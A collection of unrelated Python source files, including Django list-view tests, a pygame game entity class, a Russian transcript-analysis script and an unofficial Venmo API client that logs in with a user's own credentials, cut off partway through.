response = self.client.get('/')
self.assertTemplateUsed(response, 'home.html')
def test_home_page_uses_item_form(self):
"""test: home page uses form for item"""
response = self.client.get('/')
self.assertIsInstance(response.context['form'], ItemForm)
class ListViewTest(TestCase):
"""List view test"""
def test_uses_list_template(self):
"""test: using list template"""
list_ = List.objects.create()
response = self.client.get(f'/lists/{list_.id}/')
self.assertTemplateUsed(response, 'list.html')
def test_displays_only_items_for_that_list(self):
"""test: display items only for this list"""
correct_list = List.objects.create()
Item.objects.create(text='itemey 1', list=correct_list)
Item.objects.create(text='itemey 2', list=correct_list)
other_list = List.objects.create()
Item.objects.create(text='another item 1', list=other_list)
Item.objects.create(text='another item 2', list=other_list)
response = self.client.get(f'/lists/{correct_list.id}/')
self.assertContains(response, 'itemey 1')
self.assertContains(response, 'itemey 2')
self.assertNotContains(response, 'another item 1')
self.assertNotContains(response, 'another item 2')
def test_passes_correct_list_to_template(self):
"""test: transfer right list template"""
correct_list = List.objects.create()
response = self.client.get(f'/lists/{correct_list.id}/')
self.assertEqual(response.context['list'], correct_list)
def test_can_save_a_POST_request_to_an_existing_list(self):
"""test: can save a POST request in existing list"""
other_list = List.objects.create()
correct_list = List.objects.create()
self.client.post(
f'/lists/{correct_list.id}/',
data={'text': 'A new item for an existing list'}
)
self.assertEqual(Item.objects.count(), 1)
new_item = Item.objects.first()
self.assertEqual(new_item.text, 'A new item for an existing list')
self.assertEqual(new_item.list, correct_list)
def test_POST_redirects_to_list_view(self):
"""test: redirect list view"""
other_list = List.objects.create()
correct_list = List.objects.create()
response = self.client.post(
f'/lists/{correct_list.id}/',
data={'text': 'A new item for an existing list'}
)
self.assertRedirects(response, f'/lists/{correct_list.id}/')
def test_displays_item_form(self):
"""test display form for item"""
list_ = List.objects.create()
response = self.client.get(f'/lists/{list_.id}/')
self.assertIsInstance(response.context['form'], ExistingListItemForm)
self.assertContains(response, 'name="text"')
def post_invalid_input(self):
"""send incorrect input"""
list_ = List.objects.create()
return self.client.post(
f'/lists/{list_.id}/',
data={'text': ''}
)
def test_for_invalid_input_nothing_saved_to_db(self):
"""test incorrect input: nothing to save in BD"""
self.post_invalid_input()
self.assertEqual(Item.objects.count(), 0)
def test_for_invalid_input_renders_list_template(self):
"""ntcn incorrect input: display list template"""
response = self.post_invalid_input()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'list.html')
def test_for_invalid_input_passes_form_to_template(self):
"""test incorrect input: form is transferred to template"""
response = self.post_invalid_input()
self.assertIsInstance(response.context['form'], ExistingListItemForm)
def test_for_invalid_input_shows_on_page(self):
"""test incorrect input: error is shown on page"""
response = self.post_invalid_input()
self.assertContains(response, escape(EMPTY_ITEM_ERROR))
def test_duplicate_item_validation_errors_end_up_on_lists_page(self):
"""test: validation errors on list page"""
list1 = List.objects. create()
item1 = Item.objects.create(list=list1, text='textey')
response = self.client.post(
f'/lists/{list1.id}/',
data={'text': 'textey'}
)
expected_error = escape(DUPLICATE_ITEM_ERROR)
self.assertContains(response, expected_error)
self.assertTemplateUsed(response, 'list.html')
self.assertEqual(Item.objects.all().count(), 1)
class NewListTest(TestCase):
"""new list test"""
def test_can_save_a_POST_request(self):
"""test: can save post-request"""
self.client.post('/lists/new', data={'text': 'A new list item'})
self.assertEqual(Item.objects.count(), 1)
new_item = Item.objects.first()
self.assertEqual(new_item.text, 'A new list item')
def test_redirects_after_POST(self):
"""test: redirect after post-request"""
response = self.client.post('/lists/new', data={'text': 'A new list item'})
new_list = List.objects.first()
self.assertRedirects(response, f'/lists/{new_list.id}/')
def test_validation_errors_are_sent_back_to_home_page_template(self):
"""test: validation errors return back in home page template"""
response = self.client.post('/lists/new', data={'text': ''})
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'home.html')
expected_error = escape("You can't have an empty list item")
self.assertContains(response, expected_error)
def test_invalid_list_items_arent_saved(self):
"""test: saving wrong list items"""
self.client.post('/lists/new', data={'text': ''})
self.assertEqual(List.objects.count(), 0)
self.assertEqual(Item.objects.count(), 0)
def test_for_invalid_input_renders_home_template(self):
"""test incorrect input: displays home page"""
response = self.client.post('/lists/new', data={'text': ''})
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'home.html')
def test_validation_errors_are_shown_on_home_page(self):
"""test: validation errors are shown on home page"""
response = self.client.post('/lists/new', data={'text': ''})
self.assertContains(response, escape(EMPTY_ITEM_ERROR))
def test_for_invalid_input_passes_form_to_template(self):
"""test incorrect input: form is transferred to template"""
response = self.client.post('/lists/new', data={'text': ''})
self.assertIsInstance(response.context['form'], ItemForm)
|
import numpy as np
def dcg_at_k(r,k):
r = np.asfarray(r)[:k]
if r.size:
return np.sum( np.subtract(np.power(2,r),1)/np.log2(np.arange(2,r.size+2)))
return 0.
def ndcg_at_k(r,k):
idcg = dcg_at_k( sorted(r,reverse=True),k)
if not idcg:
return 0.
dcg = dcg_at_k(r,k)
return dcg/idcg
if __name__ == '__main__':
r = [2,1,4,3,1]
print(ndcg_at_k(r,4))
|
"""
Module containing Debug Methods and sites.
This Module should only be loaded in debug Mode.
"""
from flask.app import Flask
from . import root # noqa
from . import routes # noqa
def register_debug_routes(app: Flask):
"""Register the debug routes blueprint with the flask app."""
if not app.config["DEBUG"]:
app.logger.warning("This Module should only be loaded if DEBUG mode is active!")
raise Warning("This Module should only be loaded if DEBUG mode is active!")
app.register_blueprint(root.DEBUG_BLP)
|
#!/usr/bin/python
from typing import TYPE_CHECKING
import pygame
from glm import ivec2
from pygame.surface import SurfaceType
from game.base.script import Script
from game.base.signal import Signal, SlotList
from game.constants import *
from os import path
from game.util import *
if TYPE_CHECKING:
from game.base.app import App
from game.entities.ai import AI
class Entity:
"""
A basic component of the game scene.
An Entity represents something that will be draw on the screen.
"""
def __init__(self, app, scene, filename=None, **kwargs):
# print(type(self))
self.app: "App" = app
self.scene = scene
self.slot = None # weakref
self.slots = SlotList()
self.scripts = Signal(lambda fn: Script(self.app, self, fn, use_input=False))
self.life = kwargs.pop("life", None) # particle life (length of time to exist)
self.on_move = Signal()
self.on_update = Signal()
self.on_remove = Signal()
# self.dirty = True
self._surface = None
self.removed = False
self.parent = kwargs.pop("parent", None)
self.sounds = {}
self.particle = kwargs.pop("particle", None)
self.visible = True
self._script_func = False
script = kwargs.pop("script", None)
self.script = None # main script
self._position = kwargs.pop("position", vec3(0))
self.velocity = kwargs.pop("velocity", vec3(0))
self.acceleration = kwargs.pop("acceleration", vec3(0))
# solid means its collision-checked against other things
# has_collision means the entity has a collision() callback
self.has_collision = hasattr(self, "collision")
self.solid = self.has_collision
# if self.has_collision:
# print(self, 'has collision')
# if self.solid:
# print(self, 'is solid')
self.filename = filename
if filename:
self._surface = self.app.load_img(filename, kwargs.pop("scale", 1))
self.collision_size = self.size = estimate_3d_size(self._surface.get_size())
else:
self.collision_size = self.size = vec3(0)
self.render_size = vec3(0)
"""Should hold the size in pixel at which the entity was last rendered"""
if hasattr(self, "event"):
self.slots += app.add_event_listener(self)
if isinstance(script, str):
# load script from string 'scripts/' folder
self.script = script
self.scripts += self.script
if callable(self):
# use __call__ as script
self.script = self
self.scripts += self
ai = kwargs.pop("ai", None)
self.ai: "AI" = ai(self) if ai else None
if kwargs:
raise ValueError(
"kwrgs for Entity have not all been consumed. Left:", kwargs
)
def clear_scripts(self):
self.scripts = Signal(lambda fn: Script(self.app, self, fn, use_input=False))
# def add_script(self, fn):
# """
# :param fn: add script `fn` (cls, func, or filename)
# """
# self.scripts += script
# return script
def __str__(self):
return f"{self.__class__.__name__}(pos: {self.position}, id: {id(self)})"
# def once(self, duration, func)
# """
# A weakref version of scene.when.once.
# Used for safely triggering temp one-time events w/o holding the slot.
# """
# return self.scene.when.once(
# duration,
# lambda wself=weakref.ref(self): func(wself),
# weak=False
# )
@property
def position(self):
return self._position
@position.setter
def position(self, v):
"""
Sets position of our entity, which controls where it appears in
our scene.
:param v: 3 coordinates (list, tuple, vec3)
"""
if len(v) == 2:
print("Warning: Setting Entity position with a 2d vector.")
print("Vector:", v)
print("Entity:", self)
raise ValueError
if v is None:
v = vec3(0)
if v.x != v.x:
raise ValueError
self._position = vec3(*v)
self.on_move()
@property
def velocity(self):
return self._velocity
@velocity.setter
def velocity(self, value):
assert value == value
self._velocity = value
def remove(self):
if not self.removed:
# for slot in self.slots:
# slot.disconnect()
self.slots = []
self.on_remove()
if self.slot:
# weird bug (?):
# fail (1 pos but 2 given):
# self.scene.disconnect(self.slot):
# fail: missing require pos 'slot'
# self.scene.disconnect()
s = self.slot()
if s:
s.disconnect()
self.removed = True
# def disconnect(self):
# self.remove()
# NOTE: Implementing the below method automatically registers event listener
# So it's commented out. It still works as before.
# def event(self, event):
# """
# Handle the event if needed.
# :returns: True if the event was handled
# """
# return False
def play_sound(self, filename, callback=None, *args):
"""
Play sound with filename.
Triggers callback when sound is done
Forwards *args to channel.play()
"""
if filename in self.sounds:
self.sounds[filename][1].stop()
del self.sounds[filename]
filename = path.join(SOUNDS_DIR, filename)
sound = self.app.load(filename, lambda: pygame.mixer.Sound(filename))
if not sound:
return None, None, None
channel = pygame.mixer.find_channel()
if not channel:
return None, None, None
channel.set_volume(SOUND_VOLUME)
if callback:
slot = self.scene.when.once(self.sounds[0].get_length(), callback)
self.slots.add(slot)
else:
slot = None
self.sounds[filename] = (sound, channel, slot)
channel.play(sound, *args)
return sound, channel, slot
def update(self, dt):
# if len(self.slots) > 10:
# print(len(self.slots))
if self.ai:
self.ai.update(self, dt)
if self.acceleration != vec3(0):
self.velocity += self.acceleration * dt
if self.velocity != vec3(0):
self.position += self.velocity * dt
if self.life is not None:
self.life -= dt
if self.life <= 0:
self.remove()
return
if self.scripts:
self.scripts.each(lambda x, dt: x.update(dt), dt)
self.scripts.slots = list(
filter(lambda x: not x.get().done(), self.scripts.slots)
)
if self.slots:
self.slots._slots = list(
filter(lambda slot: not slot.once or not slot.count, self.slots._slots)
)
self.on_update(dt)
def render(
self, camera, surf=None, pos=None, scale=True, fade=True, cull=False, big=False
):
"""
Tries to renders surface `surf` from camera perspective
If `surf` is not provided, render self._surface (loaded from filename)
"""
if not self.visible:
return
if not pos:
pos = self.position
pp = self.scene.player.position if self.scene.player else vec4(0)
if cull:
if pos.x < pp.x - 1000 or pos.x > pp.x + 1000:
self.remove()
return
surf: SurfaceType = surf or self._surface
if not surf:
self.render_size = None
return
half_diag = vec3(-surf.get_width(), surf.get_height(), 0) / 2
world_half_diag = camera.rel_to_world(half_diag) - camera.position
pos_tl = camera.world_to_screen(pos + world_half_diag)
pos_bl = camera.world_to_screen(pos - world_half_diag)
if None in (pos_tl, pos_bl):
# behind the camera
self.scene.remove(self)
return
size = ivec2(pos_bl.xy - pos_tl.xy)
self.render_size = size
if not scale or 400 > size.x > 0 or big:
if scale:
# print(ivec2(size))
surf = pygame.transform.scale(surf, ivec2(size))
# don't fade close sprites
far = abs(pos.z - pp.z) > 1000
if fade and far:
max_fade_dist = camera.screen_dist * FULL_FOG_DISTANCE
alpha = surf_fader(max_fade_dist, camera.distance(pos))
# If fade is integer make it bright faster
alpha = clamp(int(alpha * fade), 0, 255)
if surf.get_flags() & pygame.SRCALPHA:
surf.fill((255, 255, 255, alpha), None, pygame.BLEND_RGBA_MULT)
else:
surf.set_alpha(alpha)
surf.set_colorkey(0)
# if not far:
# if not 'Rain' in str(self) and not 'Rock' in str(self):
# print('skipped fade', self)
self.app.screen.blit(surf, ivec2(pos_tl))
# if size.x > 150:
# self.scene.remove(self)
# def __del__(self):
# for slot in self.slots:
# slot.disconnect()
# NOTE: Implementing the below method automatically sets up Script
# def __call__(self):
# pass
# NOTE: Implementing the below method automatically sets up collisions.
# def collision(self, other, dt):
# pass
|
'''
imputationflask.secrets
-------------------
Gets secrets from google cloud secret manager. Relies on proper IAM
'''
from google.cloud import secretmanager
def csrf_key(config):
client = secretmanager.SecretManagerServiceClient()
name = client.secret_version_path(
config['PROJECT_NAME'], config['CSRF_KEY_SECRET_ID'], 'latest')
response = client.access_secret_version(name)
return response.payload.data.decode('UTF-8')
|
########################
####### BRIDGE #########
########################
# This acts as a bridge between the services and the launcher for the application
import argparse as arg
import sys
from . import logo
from . import recommendation
from . import index_data
from . import searchp
from . import preprocess
from . import meme_generator
from . import tests
if len(sys.argv)==1:
logo.print_logo()
print("Please refer to help section using openmemes --help / openmemes -h")
elif sys.argv[1] == '-h' or sys.argv[1] == '--help':
logo.print_logo()
parser = arg.ArgumentParser('bridge')
# Options for bridge #
parser.add_argument('--recommend', default=0, help='Generate recommendations')
parser.add_argument('--search', default=0, help='Search a photo')
parser.add_argument('--preprocess', default=0, help='Preprocessing Data')
parser.add_argument('--generate', default=0, help="Meme Generation service " )
parser.add_argument('--meme', type=str, default=None, help='Enter Image path or name for the meme')
## Indexing Services ##
parser.add_argument('--force_index', type=int, default=0, help="Enter 1 to force indexing")
## Searching Services ##
parser.add_argument('--mode', default=0, help='Choose from two modes: 0-Command line 1-Interactive (searchp) | 0-Command line 1-Interactive 2-URL (meme_generator)')
parser.add_argument('--search_str', type=str, default=None, help='Enter search string: ')
parser.add_argument('--index_search', type=int, default=0, help='Choose 1 to enable searching images from their indices ')
parser.add_argument('--search_idx', default=0, help='Enter image index: ')
parser.add_argument('--result', type=int, default=0, help='Enter number of images to display: ')
parser.add_argument('--display_info', default=0, help='Enter result format 0-image(default) 1-text description: ')
## Preporcessing Services ##
parser.add_argument('--data', type=str, help='Enter image path (use with preprocess)',default='data')
parser.add_argument('--width', type=int, help='Enter width of image (use with preprocess)',default=600)
## Meme_generator Services ##
parser.add_argument('--url1', default=None, help='Enter URL for first image')
parser.add_argument('--url2', default=None, help='Enter URL for second image')
parser.add_argument('--format', default=None, help='Enter the format type')
parser.add_argument('--image1', type=str, default=None, help='Enter the image path for 1st image')
parser.add_argument('--image2', type=str, default=None, help='Enter the image path for 2nd image')
parser.add_argument('--text1', type=str, default=None, help='Enter text1')
parser.add_argument('--text2', type=str, default=None, help='Enter text2')
parser.add_argument('--random', type=str, default=None, help='Enter either True or False required for format-0')
## Test Services ##
parser.add_argument('--test',type=int, default=0, help='Set this to 1 for running a diagnostic')
parser.add_argument('--module', type=str, default=None, help='Enter module to run test')
args = parser.parse_args()
# This is the endpoint for setup to work and communicate to services
def cli():
#uses command line args to invoke sevices
if args.recommend:
recommendation.start(args.meme)
if args.force_index:
index_data.start(args.force_index)
if args.search:
searchp.start(args)
if args.preprocess:
preprocess.start(args)
if args.generate:
meme_generator.start(args)
if args.test:
tests.start(args)
|
# Generated by Django 3.0.6 on 2020-06-02 19:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('LaF', '0011_auto_20200603_0026'),
]
operations = [
migrations.AlterField(
model_name='lost',
name='image',
field=models.ImageField(null=True, upload_to=''),
),
]
|
#!/usr/bin/python
# # -*- coding: utf8 -*-
import re
# reading and decoding input files
#textFile = ["/home/darya/work/lingvo_data/sample2.txt"]
textFile = ["/home/darya/work/lingvo_data/Rasshifrovki_125-147.txt",
"/home/darya/work/lingvo_data/Rasshifrovki_do_I99.txt",
"/home/darya/work/lingvo_data/Rasshifrovki_I100-124.txt"]
psychFile = "/home/darya/work/lingvo_data/PsyType.txt"
mask = u".*эт.?.? сам.*"
# create dictionaries
psychInf = {}
infWords = {}
comWords = {}
markWords = {}
numOfWordsInf = {}
numOfWordsCom = {}
numMarkWords = {}
numOfWordsPsych = {}
infReplicas = {}
comReplicas = {}
def readInfWords(text):
print "readInfWords()"
# print "first", text[0:10]
# text normalization
# - lowercase
# - remove all markup signs (time,paralinguistic signs with *)
#clearData = re.sub(u"\w", "", text)
#clearData = re.sub(u'[^\x00-\x7f]', '', clearData)
clearData = re.sub(u"\r", "\n", text)
#print "CLEAR 1 DATA start <", clearData, "> CLEAR DATA end"
clearData = re.sub(u"/", "", clearData)
clearData = re.sub(u"ord[0-9a-zA-Zа-яА-Я-]*([^0-9a-zA-Zа-яА-Я-])[ 0-9]*", "", clearData)
clearData = re.sub(u"\*[а-яА-Я]+", "", clearData)
clearData = re.sub(u"/", "", clearData)
clearData = re.sub(u'[0-9]*:[0-9]+:[0-9]+\.[0-9]+', "", clearData)
clearData = re.sub(u"@", "", clearData)
clearData = re.sub(u"\?", "", clearData)
clearData = re.sub(u"\!", "", clearData)
clearData = re.sub(u"\(", "", clearData)
clearData = re.sub(u"\)", "", clearData)
clearData = re.sub(u"\+", "", clearData)
clearData = re.sub(u"\:", "", clearData)
clearData = re.sub(u"\.", "", clearData)
clearData = re.sub(u"#", " ", clearData)
clearData = re.sub(u"\*.", "", clearData)
clearData = re.sub(u"и(\d+)", "s\\1", clearData)
clearData = re.sub(u"(s\d+)","\n\\1 ", clearData)
clearData = re.sub(u"[ \t]+"," ", clearData)
clearData = re.sub(u"\n ","\n", clearData)
clearData = re.sub(u" \n","\n", clearData)
clearData = re.sub(u"\n+","\n", clearData)
clearData = re.sub(u"frase-","", clearData)
clearData = re.sub(u"speaker","", clearData)
clearData = re.sub(u"frase","", clearData)
clearData = re.sub(u"begin time","", clearData)
clearData = re.sub(u" - ","", clearData)
clearData = re.sub(u"hhmmssms","", clearData)
clearData = re.sub(u"<с>","", clearData)
clearData = re.sub(u"<к>","", clearData)
#print clearData
# - define informant|communicant
infMatcher= ""
comMatcher = ""
info = ""
comm = ""
lastPerson = ""
infMatch = re.compile(u'([sи][0-9]+).*')
comMatch = re.compile(u'([mwмрж][0-9]+).*')
for line in clearData.split("\n"):
#print "L: <%s>" % (line)
#matching for informants and communicants
isPersonFoundInLine = False
infMatcher = infMatch.search(line)
comMatcher = comMatch.search(line)
if infMatcher:
lastPerson = "informant"
info = infMatcher.group(1)
#print "New informant was found:", info
isPersonFoundInLine = True
if not info in numOfWordsInf:
numOfWordsInf[info] = 0
infWords[info] = []
infReplicas[info] = []
if comMatcher:
lastPerson = "communicant"
comm = comMatcher.group(1)
#print "New communicant was found:", comm
isPersonFoundInLine = True
if not comm in numOfWordsCom:
numOfWordsCom[comm] = 0
comWords[comm] = []
comReplicas[comm] = []
#if isPersonFoundInLine == False:
#print "Person is not found in line:", line
#1. add a new dict with a key = Inf, value = list of replics
#2. delete the loop with words, NumOfWords + number of words in line
#print replica
#FIXME
words = line.split()
if line != info:
#if line == comm:
# if len(words) > 0 :
# print "First word is: %s"% (words[0])
# print "Line content is: %s"% (" ".join(words[1:]))
# print words
# print len(words)
if lastPerson == "informant":
infReplicas[info].append(line)
elif lastPerson == "communicant":
comReplicas[comm].append(line)
# if word != info and word != comm:
# if lastPerson == "informant":
# numOfWordsInf[info] += 1
# infWords[info].append(word)
# #print "Number of words for %s = %s For word = {%s}" %(info, numOfWordsInf, word)
# elif lastPerson == "communicant":
# numOfWordsCom[comm] += 1
# comWords[comm].append(word)
for word in line.split(" "):
#print word
if word != info and word != comm:
if lastPerson == "informant":
numOfWordsInf[info] += 1
infWords[info].append(word)
#print "Number of words for %s = %s For word = {%s}" %(info, numOfWordsInf, word)
elif lastPerson == "communicant":
numOfWordsCom[comm] += 1
comWords[comm].append(word)
#print "Number of words for %s = %s For word = {%s}" %(comm, numOfWordsCom, word)
for key in numOfWordsInf:
print "%-4s = %-3d words" % (key, numOfWordsInf[key])
#sorted_dict = sorted(numOfWordsInf, key = numOfWordsInf.get, reverse = True)
#print sorted_dict
#sorted_dict = sorted(numOfWordsInf.items(), key = lambda x:x[1])
#print sorted_dict
#for key in numOfWordsCom:
#print "%-4s = %-3d words" % (key, numOfWordsCom[key])
# else:
# print "Error with", info
#print "Found matcher:", infMatcher.group(1)
#print "Found matcher:", infMatcher.group(1)
# - compose full replica
# - tokenize replicas by spaces and punctuation
# - distribute words by dictionaries infWords and comWords
# - count them in numOfWordsInf and numOfWordsCom
def sumNumOfWordsPsych():
print "sumNumOfWordsPsych()"
# read psychtype from file
tFile = open(psychFile, "rt")
text = tFile.read().decode("Windows 1251").lower()
#print text
data = re.split(u'\t|\n', text)
len_data = len(data)
for i in range(0,len_data,2):
infNum = data[i]
if infNum == "":
continue
pType = data[i+1]
#print " Info:%s Psy:%s " % (infNum, pType)
psychInf[infNum] = pType
#get psychtype for every informant and add to numOfWordsPsych
for infNum in numOfWordsInf:
if infNum in psychInf:
pType = psychInf[infNum]
numWords = numOfWordsInf[infNum]
if pType not in numOfWordsPsych:
numOfWordsPsych[pType] = 0
#print "add",numWords, "words for informant", infNum, "which is", pType
numOfWordsPsych[pType] += numWords
for key, value in numOfWordsPsych.iteritems():
print value, " for ", key
#print " %s %d words = " % (key.encode("UTF-8"),numOfWordsPsych[key])
#numOfWordsPsych[pType] += numOfWordsInf
#if infNum not in numOfWordsInf[infNum]:
#numOfWordsPsych[pType] = 0
#if info in data
# count number of words by psychotype in numOfWordsPsych
def printResult():
print "printResult()"
# print psychInf
# print infWords
#for key in infWords:
# if key != "s125":
# continue
#print "================================", key, "\n", " ".join(infWords[key])
#for key in comWords:
# if key != "m1":
# continue
#print "================================", key, "\n", " ".join(comWords[key])
for key in infReplicas:
#print "================================", key, "\n\n", infReplicas[key]
print "================================", key, "\n", "\n".join(infReplicas[key])
# for key in comReplicas:
# #print "================================", key, "\n\n", comReplicas[key]
# print "================================", key, "\n", "\n".join(comReplicas[key])
# print comWords
# print markWords
# print numOfWordsInf
# print numOfWordsCom
# print numMarkWords
# print numOfWordsPsych
# print infReplicas
def repFilter():
print "-------------------"
for key in infReplicas:
if key in psychInf:
for line in infReplicas[key]:
if re.match(mask, line):
# print " ============= PType: %s " % (psychInf[key])
# print " ============= Informant: %s " % (key)
# print " ============= Replicas: %s " % (line)
print "%s\t %s \t%s" % (psychInf[key], key, line)
for fileName in textFile:
print "========================= Opening file ",fileName
textOpen = open(fileName,"rt")
text = textOpen.read().decode("UTF-8").lower()
#print "========================= first", text
#print "..."
readInfWords(text)
sumNumOfWordsPsych()
printResult()
repFilter()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 12 23:49:52 2018
@author: koyyk_000
"""
#given S
#
#for i=1:3
#
# split S into S_train (80%) and S_test (20%)
#
# train Classifier 1 using S_train with cross-validation, report Classifier 1's cross-validation errors (S_train) and test error (S_test)
#
# train Classifier 2 using S_train with cross-validation, report Classifier 2's cross-validation errors (S_train) and test error (S_test)
#
# train Classifier 3 using S_train with cross-validation, report Classifier 3's cross-validation errors (S_train) and test error (S_test)
#
#end
#
#compute the averaged test error for Classifier 1
#
#compute the averaged test error for Classifier 2
#
#compute the averaged test error for Classifier 3 |
import logging
from six.moves import input
from django.core.management import BaseCommand, CommandError, call_command
from elasticsearch_dsl import connections
from stretch import stretch_app
class Command(BaseCommand):
"""
Update Elasticsearch Documents
"""
can_import_settings = True
def add_arguments(self, parser):
parser.add_argument(
'--indices',
action='append',
default=list(),
help='One or more indices to operate on, by index name'
)
parser.add_argument(
'--since',
action='store',
default=None,
help='(Optional) Select objects modified since this date. YYYY-MM-DD'
)
def handle(self, *args, **options):
call_command('stretch', 'update_documents', indices=options.get('indices'),
since=options.get('since'))
|
from gym_SnakeGame.envs.SnakeGame import SnakeGameEnv
|
#!/usr/bin/python3
import os
import requests
import configparser
class Venmo:
def __init__(self):
self.session = requests.session()
self.username = None
self.phone_number = None
self.name = None
self.access_token = None
self.balance = None
self.id = None
self.email = None
self.external_id = None
self.device_id = 'EFF75587-5CB7-432B-BB59-639820DFD2DD'
def login(self, username, password):
headers = {
'Host': 'venmo.com',
'Content-Type': 'application/json; charset=utf-8',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
payload = {
"client_id": "1",
"password": password,
"phone_email_or_username": username
}
# TODO handle new devices and 2fa - Venmo-Otp-Secret in response headers
response = self.session.post('https://venmo.com/api/v5/oauth/access_token', json=payload, headers=headers)
if response.status_code == 401:
self.two_factor_auth(response.headers['Venmo-Otp-Secret'], response.headers['Set-Cookie'].split('csrftoken2=')[-1].split(';')[0])
# TODO need to class variable declarations if 2fa needed - 'response'
self.username = response.json()['username']
self.phone_number = response.json()['phone']
self.name = response.json()['name']
self.access_token = response.json()['access_token']
self.balance = response.json()['balance']
self.id = response.json()['id']
self.email = response.json()['email']
# Call method to set external id
self.get_me()
def two_factor_auth(self, otp_secret, csrftoken):
# TODO I'm in Canada will flesh this out when I'm back state-side
headers = {
'Host': 'venmo.com',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-us',
'Referer': 'https://venmo.com/',
'Venmo-Otp-Secret': otp_secret,
'Venmo-User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)'
}
# Need to go here first otherwise api call results in 400 Client error
response = self.session.get('https://venmo.com/two-factor', headers=headers)
response.raise_for_status()
del headers['device-id']
del headers['Venmo-User-Agent']
del headers['Venmo-Otp-Secret']
headers['Accept'] = 'application/json'
headers['venmo-otp-secret'] = otp_secret
response = self.session.get('https://venmo.com/api/v5/two_factor/token', headers=headers)
response.raise_for_status()
response.json() # braintree stuff and security
# send sms
headers = {
'Host': 'venmo.com',
'Accept': 'application/json',
'Accept-Language': 'en-us',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Origin': 'https://venmo.com',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Connection': 'keep-alive',
'Referer': 'https://venmo.com/',
'venmo-otp-secret': otp_secret
}
payload = {
"csrftoken2": csrftoken, # should get from the set-cookie in the response headers
"via": "sms"
}
response = self.session.post('https://venmo.com/api/v5/two_factor/token', json=payload, headers=headers)
response.raise_for_status() # response['data']['status'] == 'sent'
# Require manual input for sms - integrate automation with google voice maybe if venmo short code supported?
sms_code_received = input('SMS code received: ')
headers['venmo-otp'] = sms_code_received
payload = {
"csrftoken2": csrftoken, # should get from the set-cookie in the response headers
}
response = self.session.post('https://venmo.com/login', json=payload, headers=headers)
response.raise_for_status()
def get_account(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/account', headers=headers)
response.raise_for_status()
return response.json()
def get_alerts(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/alerts', headers=headers)
response.raise_for_status()
return response.json()
def get_me(self):
headers = {
'Host': 'venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://venmo.com/api/v5/users/me', headers=headers)
response.raise_for_status()
self.external_id = response.json()['external_id']
return response.json()
def get_suggested(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/suggested', headers=headers)
response.raise_for_status()
return response.json()
def get_authorizations(self, limit=20):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
query_string_params = {
'acknowledged': False,
'status': 'active,captured',
'limit': limit
}
response = self.session.get('https://api.venmo.com/v1/authorizations', params=query_string_params, headers=headers)
response.raise_for_status()
return response.json()
def get_stories(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/stories/target-or-actor/friends', headers=headers)
response.raise_for_status()
return response.json()
def get_merchant_views(self):
headers = {
'Host': 'api.venmo.com',
'Connection': 'keep-alive',
'device-id': self.device_id,
'Accept': 'application/json; charset=utf-8',
'User-Agent': 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)',
'Accept-Language': 'en-US;q=1.0',
'Authorization': f'Bearer {self.access_token}',
'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
}
response = self.session.get('https://api.venmo.com/v1/users/merchant-payments-activation-views', headers=headers)
